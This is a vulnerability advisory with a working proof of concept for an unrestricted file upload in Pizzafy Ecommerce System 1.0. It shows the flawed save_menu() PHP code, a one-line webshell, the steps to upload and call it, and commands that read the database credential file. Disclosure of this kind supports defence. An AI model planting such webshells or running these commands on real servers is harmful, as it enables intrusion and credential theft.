## https://sploitus.com/exploit?id=PACKETSTORM:220075
# Pizzafy Ecommerce System 1.0 โ Unrestricted File Upload in save_menu() Leads to Remote Code Execution
## Details
| Field | Value |
|---|---|
| **Vendor** | SourceCodester |
| **Vendor URL** | https://www.sourcecodester.com |
| **Product** | Pizzafy Ecommerce System using PHP and MySQL |
| **Product URL** | https://www.sourcecodester.com/php/18708/pizzafy-ecommerce-system.html |
| **Version** | 1.0 |
| **Vulnerability** | Unrestricted File Upload โ Remote Code Execution |
| **CWE** | CWE-434 |
| **CVSSv3 Score** | 7.8 (High) |
| **Attack Vector** | Network |
| **Auth Required** | Yes (Administrator) |
| **User Interaction** | None |
| **Researcher** | Imad Alvi |
| **Date** | 2026-04-12 |
---
## Affected Component
**File:** `Pizzafy/admin/admin_class_novo.php` โ `save_menu()` function
**Parameter:** `img` (FILE)
**Upload path:** `Pizzafy/assets/img/`
---
## Description
The `save_menu()` function in Pizzafy Ecommerce System 1.0 handles image uploads for menu items without performing any file type validation. The application retrieves the file extension using `pathinfo()` but never actually checks or restricts the allowed file types before moving the uploaded file to the web-accessible `assets/img/` directory. An authenticated administrator can upload a PHP webshell disguised as a menu image, then access it directly via the browser to achieve Remote Code Execution on the server.
**Vulnerable code in `admin_class_novo.php`:**
```php
function save_menu(){
extract($_POST);
// ...
if($_FILES['img']['tmp_name'] != ''){
$fname = strtotime(date('y-m-d H:i')).'_'.$_FILES['img']['name'];
$move = move_uploaded_file($_FILES['img']['tmp_name'],'../assets/img/'. $fname);
$data .= ", img_path = '$fname' ";
}
// No extension check, no MIME type check
}
```
---
## Proof of Concept
### Step 1 โ Create PHP Webshell
Create a file named `shell_web2.php` with the following content:
```php
<?php echo shell_exec($_GET['cmd']); ?>
```
### Step 2 โ Upload Webshell via Menu Management
Login as administrator and navigate to:
```
http://localhost/pizzafy/Pizzafy/admin/index.php?page=menu
```
Fill in the Menu Form with any valid values and select `shell_web2.php` as the Image file. Click **Save**.
<img width="1920" height="1080" alt="Screenshot 2026-04-12 171202" src="https://github.com/user-attachments/assets/092e31ba-d034-4711-9eac-0d409fc02ead" />
The shell is now listed as a menu item on the customer-facing page.
<img width="1920" height="1080" alt="Screenshot 2026-04-12 171236" src="https://github.com/user-attachments/assets/8e4cd4e2-98ca-4f7a-8d5b-1728aaf89731" />
### Step 3 โ Locate Uploaded Shell
Navigate to the assets directory โ directory listing is enabled (CWE-548):
```
http://192.168.0.9/pizzafy/Pizzafy/assets/img/
```
The uploaded PHP shell is visible in the directory listing.
<img width="1920" height="1080" alt="Screenshot 2026-04-12 171300" src="https://github.com/user-attachments/assets/b51aac51-6baf-41df-8b8f-53f9370864c8" />
### Step 4 โ Execute Remote Commands
Access the uploaded shell directly and pass system commands via the `cmd` parameter:
```
http://192.168.0.9/pizzafy/Pizzafy/assets/img/1775994120_shell_web2.php?cmd=whoami
```
**Response โ OS command executed on the server:**
```
desktop-g1i9np3\dell
```
<img width="1920" height="1080" alt="Screenshot 2026-04-12 171313" src="https://github.com/user-attachments/assets/403e069d-2d07-4a5d-8e68-0b95902c148e" />
---
## Additional Commands
```
?cmd=whoami
?cmd=ipconfig
?cmd=dir C:\xampp\htdocs\pizzafy
?cmd=type C:\xampp\htdocs\pizzafy\Pizzafy\admin\db_connect.php
```
---
## Impact
An authenticated administrator can:
- Upload arbitrary PHP files to the web server
- Execute any OS-level command on the server
- Read sensitive files including database credentials
- Establish a reverse shell for full persistent access
- Completely compromise the underlying server
---
## Note on Directory Listing (CWE-548)
The `assets/img/` directory has directory listing enabled, allowing unauthenticated users to browse all uploaded files including the webshell. This compounds the severity of the file upload vulnerability.
---
## References
- [SourceCodester โ Pizzafy Ecommerce System](https://www.sourcecodester.com/php/18708/pizzafy-ecommerce-system.html)
- CWE-434: Unrestricted Upload of File with Dangerous Type
- CWE-548: Exposure of Information Through Directory Listing.